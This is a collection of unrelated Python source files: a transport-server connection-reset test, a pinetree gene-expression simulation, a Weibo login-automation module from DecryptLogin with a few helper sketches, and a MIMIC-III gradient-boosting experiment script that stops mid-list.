host = transport_server_setup.public_endpoint.public_ip
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
try:
client.recv(4096) # must return ConnectionResetError
client.close()
pytest.fail("We expected an error here, but didn't get it. Exiting...")
except ConnectionResetError as ex:
# expected error
print(f"There was an expected exception {str(ex)}")
# Step 3 - restore
self.restore_ts(kube_apis, transport_server_setup)
# --- examples/three_genes_recoded.py (alexismhill3/pinetree, MIT) ---
import pinetree as pt
def execute(output):
sim = pt.Model(cell_volume=8e-16)
sim.seed(34)
sim.add_polymerase(name="rnapol", copy_number=10, speed=40, footprint=10)
sim.add_ribosome(copy_number=100, speed=30, footprint=10)
plasmid = pt.Genome(name="plasmid", length=605)
plasmid.add_promoter(name="p1", start=1, stop=10,
interactions={"rnapol": 2e8})
plasmid.add_terminator(name="t1", start=604, stop=605,
efficiency={"rnapol": 1.0})
plasmid.add_gene(name="rnapol", start=26, stop=225,
rbs_start=(26 - 15), rbs_stop=26, rbs_strength=1e7)
plasmid.add_gene(name="proteinX", start=241, stop=280,
rbs_start=(241 - 15), rbs_stop=241, rbs_strength=1e7)
plasmid.add_gene(name="proteinY", start=296, stop=595,
rbs_start=(296 - 15), rbs_stop=296, rbs_strength=1e7)
plasmid.add_weights([1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0])
sim.register_genome(plasmid)
sim.simulate(time_limit=60, time_step=1, output=output + "_counts.tsv")
if __name__ == "__main__":
execute("three_genes_recoded")
# --- components/mlserve/mlpm/response.py (autoai-org/AIFlow) ---
# coding:utf-8
from quart import Response, jsonify
def json_resp(data, status):
return jsonify(data), status
# --- DecryptLogin/modules/core/weibo.py (0honus0/DecryptLogin, MIT) ---
'''
Function:
    Simulated login for Weibo
Author:
    Charles
WeChat Official Account:
    Charles的皮卡丘
Last updated:
    2022-03-10
'''
import os
import re
import time
import json
import requests
from ..utils import removeImage, showImage, saveImage
'''Log in to Weibo on PC'''
class weiboPC():
is_callable = True
def __init__(self, **kwargs):
for key, value in kwargs.items(): setattr(self, key, value)
self.info = 'login in weibo in pc mode'
self.session = requests.Session()
self.__initialize()
'''Login function'''
def login(self, username, password, crack_captcha_func=None, **kwargs):
# Set up proxies
self.session.proxies.update(kwargs.get('proxies', {}))
# Simulate the login
data = {
'username': username,
'password': password,
'savestate': '1',
'ec': '1',
'pagerefer': '',
'entry': 'wapsso',
'sinacnlogin': '1',
}
response = self.session.post(self.login_url, headers=self.login_headers, data=data)
response_json = response.json()
# Login succeeded
if response_json['retcode'] in [20000000]:
print('[INFO]: Account -> %s, login successfully' % username)
infos_return = {'username': username}
infos_return.update(response_json)
return infos_return, self.session
# Wrong username or password
elif response_json['retcode'] in [50011002]:
raise RuntimeError('Account -> %s, fail to login, username or password error' % username)
# Security verification
elif response_json['retcode'] in [50050011]:
response = self.session.get(response_json['data']['errurl'])
msg_type, tip_content, num_times = 'sms', 'You have to secondverify your account, please input the sms code your phone received: ', 0
response_json = self.__sendverificationcode(username, msg_type=msg_type, verification_page=response)
while response_json['retcode'] not in [100000]:
num_times += 1
if num_times > 1: raise RuntimeError(response_json.get('msg'))
if response_json['retcode'] in [8513]:
msg_type, tip_content = 'private_msg', 'You have to secondverify your account, please input the verification code in your private message: '
response_json = self.__sendverificationcode(username, msg_type=msg_type, verification_page=response)
break
else:
raise RuntimeError(response_json.get('msg'))
code = input(tip_content)
params = {
'code': code,
'msg_type': msg_type,
}
response = self.session.get(self.ajcheck_url, params=params)
response_json = response.json()
if response_json['retcode'] not in [100000]:
raise RuntimeError(response_json.get('msg'))
login_url = response_json['data']['url']
self.session.get(login_url)
print('[INFO]: Account -> %s, login successfully' % username)
infos_return = {'username': username}
infos_return.update(response_json)
return infos_return, self.session
# Other errors
else:
raise RuntimeError(response_json['msg'])
'''Security verification: send a verification code'''
def __sendverificationcode(self, username=None, msg_type='sms', verification_page=None):
assert msg_type in ['sms', 'private_msg']
params = {'msg_type': msg_type}
if msg_type == 'sms':
infos = json.loads(re.search(r'phoneList: JSON.parse\(\'([^\']+)\'\),', verification_page.text).group(1))
params.update({
'number': infos[0]['number'],
'mask_mobile': infos[0]['maskMobile'],
})
else:
self.session.get('https://passport.weibo.cn/signin/secondverify/index', params={'way': 'private_msg'})
response = self.session.get(self.ajsend_url, params=params)
return response.json()
'''Initialize'''
def __initialize(self):
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
}
self.login_headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
'Content': 'application/x-www-form-urlencoded',
'Origin': 'https://passport.sina.cn',
'Referer': 'https://passport.sina.cn/signin/signin'
}
self.login_url = 'https://passport.sina.cn/sso/login'
self.ajsend_url = 'https://passport.weibo.cn/signin/secondverify/ajsend'
self.ajcheck_url = 'https://passport.weibo.cn/signin/secondverify/ajcheck'
self.session.headers.update(self.headers)
'''Log in to Weibo on mobile'''
class weiboMobile():
is_callable = True
def __init__(self, **kwargs):
for key, value in kwargs.items(): setattr(self, key, value)
self.info = 'login in weibo in mobile mode'
self.session = requests.Session()
self.__initialize()
'''Login function'''
def login(self, username, password, crack_captcha_func=None, **kwargs):
# Set up proxies
self.session.proxies.update(kwargs.get('proxies', {}))
# Simulate the login
data = {
'username': username,
'password': password,
'savestate': '1',
'ec': '1',
'pagerefer': '',
'entry': 'wapsso',
'sinacnlogin': '1',
}
response = self.session.post(self.login_url, headers=self.login_headers, data=data)
response_json = response.json()
# Login succeeded
if response_json['retcode'] in [20000000]:
print('[INFO]: Account -> %s, login successfully' % username)
infos_return = {'username': username}
infos_return.update(response_json)
return infos_return, self.session
# Wrong username or password
elif response_json['retcode'] in [50011002]:
raise RuntimeError('Account -> %s, fail to login, username or password error' % username)
# Security verification
elif response_json['retcode'] in [50050011]:
response = self.session.get(response_json['data']['errurl'])
msg_type, tip_content, num_times = 'sms', 'You have to secondverify your account, please input the sms code your phone received: ', 0
response_json = self.__sendverificationcode(username, msg_type=msg_type, verification_page=response)
while response_json['retcode'] not in [100000]:
num_times += 1
if num_times > 1: raise RuntimeError(response_json.get('msg'))
if response_json['retcode'] in [8513]:
msg_type, tip_content = 'private_msg', 'You have to secondverify your account, please input the verification code in your private message: '
response_json = self.__sendverificationcode(username, msg_type=msg_type, verification_page=response)
break
else:
raise RuntimeError(response_json.get('msg'))
code = input(tip_content)
params = {
'code': code,
'msg_type': msg_type,
}
response = self.session.get(self.ajcheck_url, params=params)
response_json = response.json()
if response_json['retcode'] not in [100000]:
raise RuntimeError(response_json.get('msg'))
login_url = response_json['data']['url']
self.session.get(login_url)
print('[INFO]: Account -> %s, login successfully' % username)
infos_return = {'username': username}
infos_return.update(response_json)
return infos_return, self.session
# Other errors
else:
raise RuntimeError(response_json['msg'])
'''Security verification: send a verification code'''
def __sendverificationcode(self, username=None, msg_type='sms', verification_page=None):
assert msg_type in ['sms', 'private_msg']
params = {'msg_type': msg_type}
if msg_type == 'sms':
infos = json.loads(re.search(r'phoneList: JSON.parse\(\'([^\']+)\'\),', verification_page.text).group(1))
params.update({
'number': infos[0]['number'],
'mask_mobile': infos[0]['maskMobile'],
})
else:
self.session.get('https://passport.weibo.cn/signin/secondverify/index', params={'way': 'private_msg'})
response = self.session.get(self.ajsend_url, params=params)
return response.json()
'''Initialize'''
def __initialize(self):
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
}
self.login_headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
'Content': 'application/x-www-form-urlencoded',
'Origin': 'https://passport.sina.cn',
'Referer': 'https://passport.sina.cn/signin/signin'
}
self.login_url = 'https://passport.sina.cn/sso/login'
self.ajsend_url = 'https://passport.weibo.cn/signin/secondverify/ajsend'
self.ajcheck_url = 'https://passport.weibo.cn/signin/secondverify/ajcheck'
self.session.headers.update(self.headers)
'''Log in to Weibo by scanning a QR code'''
class weiboScanqr():
is_callable = True
def __init__(self, **kwargs):
for key, value in kwargs.items(): setattr(self, key, value)
self.info = 'login in weibo in scanqr mode'
self.cur_path = os.getcwd()
self.session = requests.Session()
self.__initialize()
'''Login function'''
def login(self, username='', password='', crack_captcha_func=None, **kwargs):
# Set up proxies
self.session.proxies.update(kwargs.get('proxies', {}))
# Fetch the QR code
params = {
'entry': 'weibo',
'size': '180',
'callback': str(int(time.time() * 1000)),
}
response = self.session.get(self.qrcode_url, params=params)
response_json = json.loads(response.text.split('(')[-1].split(')')[0])
qrid = response_json['data']['qrid']
imageurl = 'https:' + response_json['data']['image']
response = self.session.get(imageurl)
saveImage(response.content, os.path.join(self.cur_path, 'qrcode.jpg'))
showImage(os.path.join(self.cur_path, 'qrcode.jpg'))
# Poll the QR code status
while True:
params = {
'entry': 'weibo',
'qrid': qrid,
'callback': 'STK_%s' % int(time.time() * 10000)
}
response = self.session.get(self.check_url, params=params)
response_json = json.loads(response.text.split('(')[-1].split(')')[0])
if response_json['retcode'] in [20000000]: break
time.sleep(0.5)
removeImage(os.path.join(self.cur_path, 'qrcode.jpg'))
# Simulate the login
params = {
'entry': 'weibo',
'returntype': 'TEXT',
'crossdomain': '1',
'cdult': '3',
'domain': 'weibo.com',
'alt': response_json['data']['alt'],
'savestate': '30',
'callback': 'STK_' + str(int(time.time() * 1000)),
}
response = self.session.get(self.login_url, params=params)
response_json = json.loads(response.text.split('(')[-1].split(')')[0])
response_json['crossDomainUrlList'][0] = response_json['crossDomainUrlList'][0] + '&action=login'
for url in response_json['crossDomainUrlList']:
response = self.session.get(url)
# Login succeeded
response = self.session.get(self.home_url)
print('[INFO]: Account -> %s, login successfully' % response_json.get('nick', username))
infos_return = {'username': username}
infos_return.update(response_json)
return infos_return, self.session
'''Initialize'''
def __initialize(self):
self.headers = {
'Referer': 'https://mail.sina.com.cn/',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'
}
self.home_url = 'https://weibo.com'
self.qrcode_url = 'https://login.sina.com.cn/sso/qrcode/image'
self.check_url = 'https://login.sina.com.cn/sso/qrcode/check'
self.login_url = 'http://login.sina.com.cn/sso/login.php'
self.session.headers.update(self.headers)
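The scan-status loop in weiboScanqr.login polls every 0.5 s with no upper bound, so an unscanned QR code blocks forever. A bounded variant is sketched below (hypothetical helper, with the check request injected as a callable so the sketch stays self-contained and network-free):

```python
import time

def wait_for_scan(check, interval=0.5, timeout=120):
    """Poll check() until it returns a payload or time runs out.

    check mirrors the qrcode/check request above: it should return the
    decoded response once retcode is 20000000, and None until then.
    """
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        payload = check()
        if payload is not None:
            return payload
        time.sleep(interval)
    raise TimeoutError("QR code was not scanned before the timeout")
```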
'''
Function:
    Simulated login for Weibo
Detail:
    -login:
        Input:
            --username: username
            --password: password
            --mode: mobile/pc/scanqr
            --crack_captcha_func: if a captcha-recognition interface is provided, use it to recognize captchas automatically
            --proxies: proxies for requests.Session()
        Return:
            --infos_return: information such as the username
            --session: the requests.Session() after login
'''
class weibo():
def __init__(self, **kwargs):
self.info = 'login in weibo'
self.supported_modes = {
'pc': weiboPC(**kwargs),
'mobile': weiboMobile(**kwargs),
'scanqr': weiboScanqr(**kwargs),
}
'''Login function'''
def login(self, username='', password='', mode='scanqr', crack_captcha_func=None, **kwargs):
assert mode in self.supported_modes, 'unsupport mode %s in weibo.login' % mode
selected_api = self.supported_modes[mode]
if not selected_api.is_callable: raise NotImplementedError('not be implemented for mode %s in weibo.login' % mode)
args = {
'username': username,
'password': password,
'crack_captcha_func': crack_captcha_func,
}
args.update(kwargs)
return selected_api.login(**args)
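The mode dispatch performed by weibo.login can be isolated into a small helper; this is a sketch of the same checks (hypothetical function name), useful for exercising the validation logic without touching the network:

```python
def select_mode(supported_modes, mode):
    """Pick a login backend, mirroring the checks in weibo.login."""
    if mode not in supported_modes:
        raise ValueError('unsupport mode %s in weibo.login' % mode)
    api = supported_modes[mode]
    if not getattr(api, 'is_callable', False):
        raise NotImplementedError('not be implemented for mode %s in weibo.login' % mode)
    return api
```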
# --- code/gradient_boosting.py (translational-informatics/MIMICIII-ML-experiments, MIT) ---
# This file applies GradientBoosting to given train/test pickle
# It applies basic grid search with 10 fold cross validation
# It also tabulates the weights for trained model
import argparse
import pickle
from sklearn.metrics import classification_report,confusion_matrix,roc_auc_score
import directories
parser = argparse.ArgumentParser(description='Parser to pass number of top features')
parser.add_argument('--top-fc', default=42, type=int, help='top_feature_count')
parser.add_argument('--data-set', default=0, type=int, help='Data set pickle to use (0-3)')
args = parser.parse_args()
if args.top_fc==0:
tail = "11_clinincally_viable_features/"
else:
tail = "top_{}_features/".format(args.top_fc)
if args.data_set==1:
feature_dir = directories.pickled_data_demographics+tail
elif args.data_set==2:
feature_dir = directories.pickled_data_interventions+tail
elif args.data_set==3:
feature_dir = directories.pickled_data_triples+tail
else:
feature_dir = directories.pickled_data+tail
print(feature_dir)
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import KFold
from sklearn.model_selection import GridSearchCV
X_pr_train=[]
X_pr_test=[]
Y_np_train=[]
Y_np_test=[]
with open(feature_dir+"X_pr_train.pickle", 'rb') as handle:
X_pr_train = pickle.load(handle)
with open(feature_dir+"X_pr_test.pickle", 'rb') as handle:
X_pr_test = pickle.load(handle)
with open(feature_dir+"Y_np_train.pickle", 'rb') as handle:
Y_np_train = pickle.load(handle)
with open(feature_dir+"Y_np_test.pickle", 'rb') as handle:
Y_np_test = pickle.load(handle)
clf = GradientBoostingClassifier()
svc_grid = GridSearchCV(estimator=clf,scoring = 'roc_auc', param_grid=dict(max_leaf_nodes=[3,4,5,6,7,8,9,10,11,12,13,14,15,16,17]),cv =10,n_jobs =10)
# svc_grid = GridSearchCV(estimator=clf,scoring = 'roc_auc', param_grid=dict(max_leaf_nodes=[3]),cv =10,n_jobs =15)
print(svc_grid)
print("---"*10)
import os
print("Started Training")
print("---"*10)
svc_grid.fit(X_pr_train, Y_np_train)
save_dir = os.path.join(feature_dir)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
pickle.dump(svc_grid,open(save_dir+'/gradient_boosting_tree.pickle',"wb"))
print("Saved File")
#---- Train Scores ----#
#print(svc_grid.best_estimator_)
#print(svc_grid.best_estimator_.get_params())
#ll = svc_grid.best_estimator_.coef_.tolist()[0]
#c = 0
#for l in ll:
# if l<-0.00001 or l>0.0001:
# c = c+1
#print("Coefficients")
#print(ll)
#print("Coefficients %d"%len(ll))
#print("Non-zero coefficients %d"%c)
y_pred = svc_grid.predict(X_pr_train)
print("Train Scores")
print("---"*10)
print('Classification Report \n',classification_report(Y_np_train, y_pred))
print("-"*10)
print('CONFUSION MATRIX \n',confusion_matrix(Y_np_train, y_pred))
print("-"*10)
pred_scores = svc_grid.best_estimator_.predict_proba(X_pr_train)
print('Roc value\n',roc_auc_score(Y_np_train,pred_scores[:,1]))
#-- Test Scores---#
print("Test Scores")
print("---"*10)
y_pred = svc_grid.predict(X_pr_test)
print('Classification Report \n',classification_report(Y_np_test, y_pred))
print("-"*10)
print('CONFUSION MATRIX \n',confusion_matrix(Y_np_test, y_pred))
print("-"*10)
pred_scores = svc_grid.predict_proba(X_pr_test)
print('Roc value\n',roc_auc_score(Y_np_test,pred_scores[:,1]))
f_imp = svc_grid.best_estimator_.feature_importances_
print("Feature importance")
print(f_imp)
print("[")
for l in f_imp:
print(str(l)+",")
print("]")
def tabulate_weights(features,weights):
pos = 0
non_zero_count = 0
feature_total = {}
feature_count = {}
for x in features:
l = len(x)
n = x
if x[l-4:l]==" min":
n = x[0:l-4]
elif x[l-4:l]==" max":
n = x[0:l-4]
elif x[l-5:l]==" mean":
n = x[0:l-5]
elif x[l-5:l]==" skew":
n = x[0:l-5]
elif x[l-4:l]==" std":
n = x[0:l-4]
c = 48
while c > 0:
c = c-1
feature_total[n] = feature_total.setdefault(n,0)+weights[pos]
feature_count[n] = feature_count.setdefault(n,0)+1
if weights[pos]>0:
non_zero_count = non_zero_count+1
pos = pos+1
k = list(feature_total.keys())
k.sort(key= lambda x: feature_total[x])
l = []
for q in k:
l.append((q,feature_total[q],feature_count[q]))
return (l,feature_total,feature_count,non_zero_count)
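tabulate_weights strips the per-statistic suffix (" min", " max", " mean", " skew", " std") from each feature name before summing weights. The grouping step alone can be sketched as a small self-contained helper (hypothetical names; this omits the 48-fold repetition handled in the function above) to make that aggregation explicit:

```python
from collections import defaultdict

STAT_SUFFIXES = (" min", " max", " mean", " skew", " std")

def base_feature(name):
    """Drop a trailing per-statistic suffix from a feature name."""
    for suffix in STAT_SUFFIXES:
        if name.endswith(suffix):
            return name[: -len(suffix)]
    return name

def sum_by_feature(features, weights):
    """Sum the weights of each feature's per-statistic columns."""
    totals = defaultdict(float)
    for name, weight in zip(features, weights):
        totals[base_feature(name)] += weight
    return dict(totals)
```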
if args.data_set==0:
if args.top_fc==0:
features = [
"Bicarbonate max",
"Bicarbonate mean",
"Bicarbonate min",
"Bicarbonate skew",
"Bicarbonate std",
"Blood urea nitrogen max",
"Blood urea nitrogen mean",
"Blood urea nitrogen min",
"Blood urea nitrogen skew",
"Blood urea nitrogen std",
"CO2 (ETCO2, PCO2, etc.) max",
"CO2 (ETCO2, PCO2, etc.) mean",
"CO2 (ETCO2, PCO2, etc.) min",
"CO2 (ETCO2, PCO2, etc.) skew",
"CO2 (ETCO2, PCO2, etc.) std",
"Creatinine max",
"Creatinine mean",
"Creatinine min",
"Creatinine skew",
"Creatinine std",
"Lactate max",
"Lactate mean",
"Lactate min",
"Lactate skew",
"Lactate std",
"Oxygen saturation max",
"Oxygen saturation mean",
"Oxygen saturation min",
"Oxygen saturation skew",
"Oxygen saturation std",
"Partial pressure of carbon dioxide max",
"Partial pressure of carbon dioxide mean",
"Partial pressure of carbon dioxide min",
"Partial pressure of carbon dioxide skew",
"Partial pressure of carbon dioxide std",
"Positive end-expiratory pressure max",
"Positive end-expiratory pressure mean",
"Positive end-expiratory pressure min",
"Positive end-expiratory pressure skew",
"Positive end-expiratory pressure std",
"Potassium max",
"Potassium mean",
"Potassium min",
"Potassium skew",
"Potassium std",
"White blood cell count max",
"White blood cell count mean",
"White blood cell count min",
"White blood cell count skew",
"White blood cell count std",
"pH max",
"pH mean",
"pH min",
"pH skew",
"pH std",
]
elif args.top_fc==42:
features = [
"Blood culture max",
"Blood culture mean",
"Blood culture min",
"Blood culture skew",
"Blood culture std",
"Creatinine max",
"Creatinine mean",
"Creatinine min",
"Creatinine skew",
"Creatinine std",
"Red blood cell count max",
"Red blood cell count mean",
"Red blood cell count min",
"Red blood cell count skew",
"Red blood cell count std",
"Glucose max",
"Glucose mean",
"Glucose min",
"Glucose skew",
"Glucose std",
"Cholesterol max",
"Cholesterol mean",
"Cholesterol min",
"Cholesterol skew",
"Cholesterol std",
"pH max",
"pH mean",
"pH min",
"pH skew",
"pH std",
"Potassium max",
"Potassium mean",
"Potassium min",
"Potassium skew",
"Potassium std",
"Calcium max",
"Calcium mean",
"Calcium min",
"Calcium skew",
"Calcium std",
"Lactate dehydrogenase max",
"Lactate dehydrogenase mean",
"Lactate dehydrogenase min",
"Lactate dehydrogenase skew",
"Lactate dehydrogenase std",
"Lactate max",
"Lactate mean",
"Lactate min",
"Lactate skew",
"Lactate std",
"Chloride max",
"Chloride mean",
"Chloride min",
"Chloride skew",
"Chloride std",
"Partial pressure of carbon dioxide max",
"Partial pressure of carbon dioxide mean",
"Partial pressure of carbon dioxide min",
"Partial pressure of carbon dioxide skew",
"Partial pressure of carbon dioxide std",
"Mean corpuscular hemoglobin concentration max",
"Mean corpuscular hemoglobin concentration mean",
"Mean corpuscular hemoglobin concentration min",
"Mean corpuscular hemoglobin concentration skew",
"Mean corpuscular hemoglobin concentration std",
"Mean corpuscular hemoglobin max",
"Mean corpuscular hemoglobin mean",
"Mean corpuscular hemoglobin min",
"Mean corpuscular hemoglobin skew",
"Mean corpuscular hemoglobin std",
"Partial thromboplastin time max",
"Partial thromboplastin time mean",
"Partial thromboplastin time min",
"Partial thromboplastin time skew",
"Partial thromboplastin time std",
"Prothrombin time max",
"Prothrombin time mean",
"Prothrombin time min",
"Prothrombin time skew",
"Prothrombin time std",
"Magnesium max",
"Magnesium mean",
"Magnesium min",
"Magnesium skew",
"Magnesium std",
"Oxygen saturation max",
"Oxygen saturation mean",
"Oxygen saturation min",
"Oxygen saturation skew",
"Oxygen saturation std",
"CO2 (ETCO2, PCO2, etc.) max",
"CO2 (ETCO2, PCO2, etc.) mean",
"CO2 (ETCO2, PCO2, etc.) min",
"CO2 (ETCO2, PCO2, etc.) skew",
"CO2 (ETCO2, PCO2, etc.) std",
"White blood cell count max",
"White blood cell count mean",
"White blood cell count min",
"White blood cell count skew",
"White blood cell count std",
"Positive end-expiratory pressure max",
"Positive end-expiratory pressure mean",
"Positive end-expiratory pressure min",
"Positive end-expiratory pressure skew",
"Positive end-expiratory pressure std",
"Anion gap max",
"Anion gap mean",
"Anion gap min",
"Anion gap skew",
"Anion gap std",
"Sodium max",
"Sodium mean",
"Sodium min",
"Sodium skew",
"Sodium std",
"Phosphate max",
"Phosphate mean",
"Phosphate min",
"Phosphate skew",
"Phosphate std",
"Bicarbonate max",
"Bicarbonate mean",
"Bicarbonate min",
"Bicarbonate skew",
"Bicarbonate std",
"Mean corpuscular volume max",
"Mean corpuscular volume mean",
"Mean corpuscular volume min",
"Mean corpuscular volume skew",
"Mean corpuscular volume std",
"Hematocrit max",
"Hematocrit mean",
"Hematocrit min",
"Hematocrit skew",
"Hematocrit std",
"Eosinophils max",
"Eosinophils mean",
"Eosinophils min",
"Eosinophils skew",
"Eosinophils std",
"Asparate aminotransferase max",
"Asparate aminotransferase mean",
"Asparate aminotransferase min",
"Asparate aminotransferase skew",
"Asparate aminotransferase std",
"Blood urea nitrogen max",
"Blood urea nitrogen mean",
"Blood urea nitrogen min",
"Blood urea nitrogen skew",
"Blood urea nitrogen std",
"Monocytes max",
"Monocytes mean",
"Monocytes min",
"Monocytes skew",
"Monocytes std",
"Albumin max",
"Albumin mean",
"Albumin min",
"Albumin skew",
"Albumin std",
"Bilirubin max",
"Bilirubin mean",
"Bilirubin min",
"Bilirubin skew",
"Bilirubin std",
"Hemoglobin max",
"Hemoglobin mean",
"Hemoglobin min",
"Hemoglobin skew",
"Hemoglobin std",
"Alanine aminotransferase max",
"Alanine aminotransferase mean",
"Alanine aminotransferase min",
"Alanine aminotransferase skew",
"Alanine aminotransferase std",
"Troponin-I max",
"Troponin-I mean",
"Troponin-I min",
"Troponin-I skew",
"Troponin-I std",
"Platelets max",
"Platelets mean",
"Platelets min",
"Platelets skew",
"Platelets std",
"Alkaline phosphate max",
"Alkaline phosphate mean",
"Alkaline phosphate min",
"Alkaline phosphate skew",
"Alkaline phosphate std",
"Neutrophils max",
"Neutrophils mean",
"Neutrophils min",
"Neutrophils skew",
"Neutrophils std",
"Lymphocytes max",
"Lymphocytes mean",
"Lymphocytes min",
"Lymphocytes skew",
"Lymphocytes std",
"Basophils max",
"Basophils mean",
"Basophils min",
"Basophils skew",
"Basophils std",
"Troponin-T max",
"Troponin-T mean",
"Troponin-T min",
"Troponin-T skew",
"Troponin-T std",
]
else:
features = []
elif args.data_set==1:
if args.top_fc==0:
features = [
"Bicarbonate max",
"Bicarbonate mean",
"Bicarbonate min",
